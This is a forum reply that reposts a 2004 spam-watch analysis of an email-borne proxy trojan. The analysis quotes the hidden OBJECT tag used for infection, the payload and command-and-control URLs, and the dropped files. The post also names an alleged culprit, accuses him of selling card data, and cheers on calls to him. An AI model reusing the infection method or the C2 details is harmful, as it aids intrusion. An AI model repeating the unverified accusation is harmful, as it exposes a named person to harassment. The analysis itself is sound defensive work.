Get exclusive CAP network offers from top brands

View CAP Offers

Reply To: Phone a Spammer

[bsa_pro_ad_space id=2]
#646649
Anonymous
Inactive

Some more info on this scumbag:

Type: Trojan (lures you to a website to be infected by a trojan)
Domain(s)/IP Address(es) used: hotwincasino.com (WHOIS) (DNS)
Exact Link: http://www.hotwincasino.com/page.php
Email’s Originating Network(s): Sjrb.ca (Canadian Network)
Danger Level: Medium

Description

Yes another spammed out trojan but this time some what different to the most recent ones, mostly in that it does not appear to be a keylogger at alll. We received an email early this morning with the subject of:

YOU WON A FREE VACATION

The email also appeared to have no body. It was simply an empty email that scrolled for a fair way. Being suspicous of this we had a peek at the source of the email. We were not to terribly surprised to find that even though the email displayed nothing in the body there was a line, right down the bottom that read:

object data=”xhttp://www.hotwincasino.com/page.php” width=”14″ height=”14″

A we’ve mentioned many times before, the OBJECT tag is a method of embedding other content into a HTML page. In this case it fetches and tries to open:

[url]xhttp://www.hotwincasino.com/page.php[/url]

We fetched a copy of this page to investigate further. Again we were not surprised to find the page was a HTA (HTML Application) which is basically a very powerful way of allowing web pages interact with Windows systems. At present we don’t have a full idea of how this one works. We know that it calls the file:

[url]xhttp://www.hotwincasino.com/mstasks.exe[/url]

In order to do something with it but this time the spammers have been clever and used an ecoding function of VBScript to make the code unreadable to humans. Being non-programmers ourselves we are unsure how to go about decoding this script. If there are any VBScript people out there who would like to give the code a look over (remember it is viral so be careful) there is a copy in the zipe file below.

We downloaded the mstasks.exe file from the site (not to be confused with the Windows file mstask.exe) and ran strings across it in order to extract any plain text that might give us some clues. This first pass was not very succesful and we only ended up with some information that confirmed that it appeared to hook into various components of Windows networking.

In order to find out more, we once again set up our VMware (virtual machine) with a victim Windows 2000 operating system. Internal monitoring was set up using the free utilies from Sysinternals who make some very good tools, highly recommended for forensics work on Windows machines. External network monitoring was set up on our Linux gateway.

Once this was set up we loaded up the page the email used and sat back to watch what happened. Well the good news is that the intial infection phase doesn’t appear to work to well. Our Windows 2000 set up is totally unpatched but Internet Explorer did actually ask us if we wanted to save or execute the code being sucked down. This should tip most people off to something being wrong and cancelling the transaction. However since we don’t have other systems to test, perhaps other versions of Windows do execute the code without asking.

Either way, once the code is executed a small blank window pops up. Nothing inside it. However in the background there is some serious work happening. From what we can tell the contents of mstasks.exe are downloaded and then executed on the machine. This creates a number of files. We found that in the C: directory there were two new executable files:

y.exe
x.exe

We also found the in the C:WINNTsystem32 directory there was a file called:

scchost.exe

Notice again how the spammers have tried to make the file name similar to a real Windows file in the same directory (svchost.exe). We found that this file was now also running as a full time process in the background. After about 30 seconds another executable was created in the same directory this time called:

scchostc.exe

This was also started as a full time process (as a child of scchost.exe) and began to listen on a port. Later on we found that this port was choosen at random each time the trojan started up. For example some of the ports we saw being used:

40627
12052
36890

After this point the trojan appeared to simply sit there and await instructions. After probing the open port for a bit we came to the conclusion that it was a proxy server. At around this time we also noticed some network traffic from the machine. First there was a call from the machine to the site:

http://www.ip2location.com/map.asp

Which is a legitimate web site that simply reports back where your request is coming from and if you are behind a proxy server. This is used by the trojan to obtain the machines real IP address for the next phase.

The next phase is then to send a request that says:

[url]xhttp://216.52.184.239/command.php?IP=[/url]&Port=

Once this is done the remote server starts sending back a steady stream of what look like web site fetch requests. However since we’re not super savy with these we are unable to tell completly.

Basically what we have here is a clever little proxy trojan that the spammers could easily use for a number of things. Making anonymous web requests, sending out spam, attacking other machines on the internet and the fact it reports back to base to keep the spammers up to date is quite handy for them as they don’t have to bother probing to see which machines are infected.

Having watched the infection in action we then decided to turn our attention back to the executable files. After some more probing we found that several of the files had been packed with UPX and that was why we were getting very little information out of them. We ran the UPX unpacker across the following files:

mstasks.exe
scchostc.exe
y.exe

The other files we found not be packed with UPX. Once all the files were unpacked we ran strings across them and came out with some interesting results:

mstasks.exe – The intial infection file. Creates scchost.exe and scchostc.exe. Also adds registery entries to ensure trojan starts at boot time. Also seems to contain the packed components of the other files

x.exe – Seems to be a left over from the trojan install. Seems to just download mstasks.exe and save it to y.exe

y.exe – A duplicate of mstasks.exe

scchost.exe – Trojan start up file. Sets up trojan environment, intialses scchostc.exe and finds out victim machines IP address using the above stated method.

scchostc.exe – The proxy part of the trojan. Turns out to be a copy of a legitimate proxy software known as 3Proxy. It appears trojan writers have used this before as many anti-virus scanners detect it as Backdoor.Daemonize

It is important to note this is not a worm or a virus. It is not self propating. That was purposefully sent out by the spammers, as a bulk email in order to get people infected with this trojan.

Now we knew what the trojan did, we turned back to where the trojan came from. We had a look at the top level for the site and found that it was nothing more than an empty place holder. We also found the files are being hosted on Yahoo! servers. We will contact Yahoo! shortly and inform them of this breach of the AUP and hopefully get the viral files quickly pulled down. We also found that where the trojan is reporting back to appears to be linked with this domain:

playthehouse.com – (WHOIS) (DNS)

This link is strengthend, for when we check the apparenet registrants for both domains we find the same person:

Jeroen Puttemans

It appears that the he is heavily involved with online casino’s and given what we are seeing today is not above stopping to using trojaned machines to do some dirty work for him.

Extra Information

Copy of the email – Due to the fact that Interent Explorer has a habit of trying to execute HTML code even when a file is marked as plain text, we will not be placing a copy of the email here until the sites are confirmed to have been taken down. A copy of the email will be in the zip file

Strings of mstasks.exe – Before unpacking

Strings of mstasks.exe – After unpacking

Strings of x.exe – No unpacking needed

Strings of y.exe – Before unpacking

Strings of y.exe – After unpacking

Strings of scchost.exe – No unpacking needed

Strings of scchostc.exe – Before unpacking

Strings of scchostc.exe – After unpacking

Screen shot of Internet Explorer prompting to execute or download the trojan

Screen shot of the window that pops up in the user chooses to execute it

Screen shot showing scchost.exe running in the background

Screen shot showing the prescence of x.exe and y.exe

Screen shot showing scchostc.exe being started as a child of scchost.exe

Screen shot showing scchostc.exe listening on a random port – In this case port 12052

WARNING

Some of the files contained in the following zip file are viral in nature. As such we only recommend those who know what they are doing download the file. Code Fish Spam Watch will not take responsibility if this warning is ignored and your machine is infected.

Copy of trojan site and other details – Contained within a passworded zip file. Password “trojan” but without quotes.

Log of further activity

7:15 9/3/04 – Domain still fully active. Going to try and find another way to contact Yahoo!

And more:
http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=82

And he sells credit card info:
http://www.casinoaffiliateprograms.com/bb/showthread.php?threadid=445

http://www.startcasino.com/read.php?f=1&i=5333&t=5333

I expect he will get a few more phone calls and maybe a knock on the door.

:D